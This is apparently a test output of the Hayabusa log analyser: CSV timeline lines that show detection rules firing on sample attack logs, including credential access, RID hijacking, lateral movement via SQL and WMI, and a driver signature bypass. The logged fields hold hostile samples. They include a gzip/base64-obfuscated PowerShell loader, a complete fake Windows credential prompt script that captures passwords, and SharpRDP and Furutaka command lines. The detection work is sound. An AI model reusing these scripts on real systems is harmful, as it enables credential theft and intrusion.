+2019-09-03 20:36:26.005 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.2.15:137 (MSEDGEWIN10) | Dst: 10.255.255.255:137 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
+2019-09-03 20:36:26.005 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.255.255.255:137 () | Dst: 10.0.2.15:137 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
+2019-09-06 22:49:35.433 +09:00,MSEDGEWIN10,17,medium,,Pipe Created_Sysmon Alert,CredAccess - Keko default np | Pipe: \kekeo_tsssp_endpoint | Process: c:\Users\IEUser\Desktop\kekeo.exe | PID: 6908 | PGUID: 747F3D96-393E-5D72-0000-0010AD443200,../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon17_18_kekeo_tsssp_default_np.evtx
+2019-09-06 22:49:39.823 +09:00,MSEDGEWIN10,18,medium,,Pipe Connected_Sysmon Alert,CredAccess - Keko default np | Pipe: \kekeo_tsssp_endpoint | Process: C:\Users\IEUser\Desktop\kekeo.exe | PID: 7808 | PGUID: 747F3D96-3944-5D72-0000-001019773200,../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon17_18_kekeo_tsssp_default_np.evtx
+2019-09-06 23:58:44.918 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 3128 | PGUID: 747F3D96-7424-5D72-0000-0010BEFBBC00,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon17_18_kekeo_tsssp_default_np.evtx
+2019-09-09 04:14:54.471 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Guest RID Hijack | SetValue: HKLM\SAM\SAM\Domains\Account\Users\000001F5\F: Binary Data | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | PID: 7680 | PGUID: 747F3D96-067D-5D75-0000-001007745500,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx
+2019-09-09 04:17:44.249 +09:00,MSEDGEWIN10,13,low,ResDev,Usage of Sysinternals Tools,,../hayabusa-rules/sigma/registry_event/registry_event_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx
+2019-09-09 22:35:08.655 +09:00,MSEDGEWIN10,4104,medium,,Potentially Malicious PwSh,"&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAAlVdl0CA81UXW/aMBR996+4svJANJIfgNQHBNs6aaWIsO2hnSbXuaVeEzuyHdKI8d93YwIDTUJlfVkeLPme+3F87lEeay29Mho+6bV5xuSzWSk9t6as/IZF0mIOVxBdG+fTWqU74IOxEwJQeyWKAf+mdG4aBxnK2irf8iHweYHCIVAKWqgdHfJQ4bqECPV61AG5KYXS94e7FiXyIecxi/ZXYsBPcRbtyk6QXYiwx7ooAtJH4B3w+3BGRx0q4VxjbHhfRy79iH6GnkLPR6+L030eG+d5smwrhIQiWD4UbSCXtc5jmU6VRemNbTO0ayXRpWMpTa39jdBihSX1Y9E0o2kzbJLbh5+UfUEtSa+0VJUoJoZEffGDuwuK+5qO/ffR6EbIJ6UxZs2TKnBArNKvolC58Pjn5W7Ag5C0i4NUPIZEI0RLW2O8YUDfv1uEDNcNhaORQ+h9420LYtXt7nVWCUzO2CXgZywT8FfZJmRebJ2u6u32CbP/Mwv1nM4aCE4c9AtM7RNNSCjeMogoUNW+U1NjszfUGWGph8OCKCdmJ8IX2s+M1BzCNOyOjHSQvu/OYLHJluPF8sd8cTt5n2VbtmV///R+A6HMO3IQBQAA'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx
+2019-09-09 22:35:08.655 +09:00,MSEDGEWIN10,4104,info,,PwSh Scriptblock Log,"&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAAlVdl0CA81UXW/aMBR996+4svJANJIfgNQHBNs6aaWIsO2hnSbXuaVeEzuyHdKI8d93YwIDTUJlfVkeLPme+3F87lEeay29Mho+6bV5xuSzWSk9t6as/IZF0mIOVxBdG+fTWqU74IOxEwJQeyWKAf+mdG4aBxnK2irf8iHweYHCIVAKWqgdHfJQ4bqECPV61AG5KYXS94e7FiXyIecxi/ZXYsBPcRbtyk6QXYiwx7ooAtJH4B3w+3BGRx0q4VxjbHhfRy79iH6GnkLPR6+L030eG+d5smwrhIQiWD4UbSCXtc5jmU6VRemNbTO0ayXRpWMpTa39jdBihSX1Y9E0o2kzbJLbh5+UfUEtSa+0VJUoJoZEffGDuwuK+5qO/ffR6EbIJ6UxZs2TKnBArNKvolC58Pjn5W7Ag5C0i4NUPIZEI0RLW2O8YUDfv1uEDNcNhaORQ+h9420LYtXt7nVWCUzO2CXgZywT8FfZJmRebJ2u6u32CbP/Mwv1nM4aCE4c9AtM7RNNSCjeMogoUNW+U1NjszfUGWGph8OCKCdmJ8IX2s+M1BzCNOyOjHSQvu/OYLHJluPF8sd8cTt5n2VbtmV///R+A6HMO3IQBQAA'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx
+2019-09-09 22:35:09.315 +09:00,MSEDGEWIN10,4104,medium,,Potentially Malicious PwSh,"function Invoke-LoginPrompt{ $cred = $Host.ui.PromptForCredential(""Windows Security"", ""Please enter user credentials"", ""$env:userdomain\$env:username"","""") $username = ""$env:username"" $domain = ""$env:userdomain"" $full = ""$domain"" + ""\"" + ""$username"" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) while($DS.ValidateCredentials(""$full"",""$password"") -ne $True){ $cred = $Host.ui.PromptForCredential(""Windows Security"", ""Invalid Credentials, Please try again"", ""$env:userdomain\$env:username"","""") $username = ""$env:username"" $domain = ""$env:userdomain"" $full = ""$domain"" + ""\"" + ""$username"" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) $DS.ValidateCredentials(""$full"", ""$password"") | out-null } $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password $output R{START_PROCESS} } Invoke-LoginPrompt",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx
+2019-09-09 22:35:09.315 +09:00,MSEDGEWIN10,4104,info,,PwSh Scriptblock Log,"function Invoke-LoginPrompt{ $cred = $Host.ui.PromptForCredential(""Windows Security"", ""Please enter user credentials"", ""$env:userdomain\$env:username"","""") $username = ""$env:username"" $domain = ""$env:userdomain"" $full = ""$domain"" + ""\"" + ""$username"" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) while($DS.ValidateCredentials(""$full"",""$password"") -ne $True){ $cred = $Host.ui.PromptForCredential(""Windows Security"", ""Invalid Credentials, Please try again"", ""$env:userdomain\$env:username"","""") $username = ""$env:username"" $domain = ""$env:userdomain"" $full = ""$domain"" + ""\"" + ""$username"" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) $DS.ValidateCredentials(""$full"", ""$password"") | out-null } $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password $output R{START_PROCESS} } Invoke-LoginPrompt",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx
+2019-09-09 22:35:09.315 +09:00,MSEDGEWIN10,4104,high,CredAccess | Exec,PowerShell Credential Prompt,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_prompt_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx
+2019-09-09 22:35:09.315 +09:00,MSEDGEWIN10,4104,medium,Persis,Manipulation of User Computer or Group Security Principals Across AD,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx
+2019-09-22 20:22:05.201 +09:00,MSEDGEWIN10,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-3461203602-4096304019-2269080069-501 | Group: Administrators | LID: 0x27a10f,../hayabusa-rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx
+2019-09-22 20:23:19.251 +09:00,MSEDGEWIN10,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-20 | Group: Administrators | LID: 0x27a10f,../hayabusa-rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx
+2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c set > c:\users\\public\netstat.txt | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\sqlsvc | Parent Cmd: ""c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe"" -sSQLEXPRESS | LID: 0x1d51e | PID: 5004 | PGUID: 747F3D96-DB7C-5DBE-0000-0010CF6B9502",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx
+2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx
+2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,low,Evas,Cmd Stream Redirection,,../hayabusa-rules/sigma/process_creation/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx
+2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx
+2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx
+2019-11-15 17:19:02.298 +09:00,alice.insecurebank.local,1102,high,Evas,Security Log Cleared,User: bob,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx
+2019-11-15 17:19:17.134 +09:00,alice.insecurebank.local,4634,info,,Logoff,User: ANONYMOUS LOGON | LID: 0x1d12916,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx
+2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 url.dll,FileProtocolHandler ms-browser:// | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7a3aff | PID: 4180 | PGUID: 747F3D96-2842-5E1E-0000-00100C417A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:44:51.016 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32 url.dll,FileProtocolHandler ms-browser:// | LID: 0x7a3aff | PID: 1568 | PGUID: 747F3D96-2842-5E1E-0000-0010745E7A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:44:51.122 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""cmd.exe"" /c notepad.exe | LID: 0x7a3aff | PID: 676 | PGUID: 747F3D96-2843-5E1E-0000-0010B1687A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 url.dll,OpenURL ms-browser:// | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7beb57 | PID: 3412 | PGUID: 747F3D96-28B3-5E1E-0000-00101DF17B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:46:43.819 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32 url.dll,OpenURL ms-browser:// | LID: 0x7beb57 | PID: 1656 | PGUID: 747F3D96-28B3-5E1E-0000-001032047C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:46:43.836 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""cmd.exe"" /c notepad.exe | LID: 0x7beb57 | PID: 2964 | PGUID: 747F3D96-28B3-5E1E-0000-0010900A7C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe /c start ms-browser:// | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7cef82 | PID: 4448 | PGUID: 747F3D96-2910-5E1E-0000-001053F57C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:48:17.412 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c start ms-browser:// | LID: 0x7cef82 | PID: 2416 | PGUID: 747F3D96-2911-5E1E-0000-0010D80A7D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:48:17.447 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""cmd.exe"" /c notepad.exe | LID: 0x7cef82 | PID: 1344 | PGUID: 747F3D96-2911-5E1E-0000-00109C137D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: explorer ms-browser:// | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7d58cd | PID: 3828 | PGUID: 747F3D96-292D-5E1E-0000-0010F5597D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:48:45.293 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x565a6 | PID: 6020 | PGUID: 747F3D96-292D-5E1E-0000-001025607D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-24 04:09:34.052 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: SharpRDP.exe computername=192.168.56.1 command=""C:\Temp\file.exe"" username=domain\user password=password | Process: C:\ProgramData\USOShared\SharpRDP.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0xd50da8 | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx
+2020-01-24 04:09:34.657 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\ProgramData\USOShared\AxInterop.MSTSCLib.dll | Process: C:\ProgramData\USOShared\SharpRDP.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100 | Hash: SHA1=7E613165F4E4696AB13D8D5F3F889131EBC186E0,MD5=A482BE452F384E446FD9F3A91986FCD4,SHA256=9DDAE70F550B452ABE3C75A6036845ABD4134F858C1DEC3343762D97A9CF8450,IMPHASH=DAE02F32A21E03CE65412F6E56942DAA",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx
+2020-01-24 04:09:34.657 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\ProgramData\USOShared\AxInterop.MSTSCLib.dll | Process: C:\ProgramData\USOShared\SharpRDP.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100 | Hash: SHA1=7E613165F4E4696AB13D8D5F3F889131EBC186E0,MD5=A482BE452F384E446FD9F3A91986FCD4,SHA256=9DDAE70F550B452ABE3C75A6036845ABD4134F858C1DEC3343762D97A9CF8450,IMPHASH=DAE02F32A21E03CE65412F6E56942DAA",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx
+2020-01-24 04:09:34.660 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"LM - suspicious RDP Client | Image: C:\Windows\SysWOW64\mstscax.dll | Process: C:\ProgramData\USOShared\SharpRDP.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100 | Hash: SHA1=359B2E4C537B00DD450D1E7B3465EE1BA094E8D6,MD5=654534BAC7465961F302C7A990DFDC8D,SHA256=D9827ABED81572C296BB6A63863515BA7B9EB1C8164A4E92A97E1FF0BD04AAB1,IMPHASH=1EA1D2F3BE5D1C352344C4CBF6A7614C",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx
+2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: Furutaka.exe dummy2.sys | Process: C:\Users\Public\BYOV\TDL\Furutaka.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x31a17 | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00 | Hash: SHA1=68B26C16080D71013123C6DEE7B1AABC3D2857D0,MD5=B1B981CD8B111783B80F3C4E10086912,SHA256=37805CC7AE226647753ACA1A32D7106D804556A98E1A21AC324E5B880B9A04DA,IMPHASH=114E27FBB0E975697F2F9988DE884FA7",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
+2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
+2020-02-10 17:28:12.876 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\drivers\VBoxDrv.sys | Process: c:\Users\Public\BYOV\TDL\Furutaka.exe | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
+2020-02-10 17:28:12.981 +09:00,MSEDGEWIN10,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\drivers\VBoxDrv.sys | Signature: innotek GmbH,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
+2020-02-10 17:28:12.981 +09:00,MSEDGEWIN10,6,medium,Evas,Driver Loaded_Unsigned,"Path: C:\Windows\System32\drivers\VBoxDrv.sys | Status: Valid | Hash: SHA1=7C1B25518DEE1E30B5A6EAA1EA8E4A3780C24D0C,MD5=EAEA9CCB40C82AF8F3867CD0F4DD5E9D,SHA256=CF3A7D4285D65BF8688215407BCE1B51D7C6B22497F09021F0FCE31CBEB78986,IMPHASH=B262E8D078EDE007EBD0AA71B9152863",../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
+2020-02-10 17:28:13.098 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\BYOV\TDL\Furutaka.exe | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
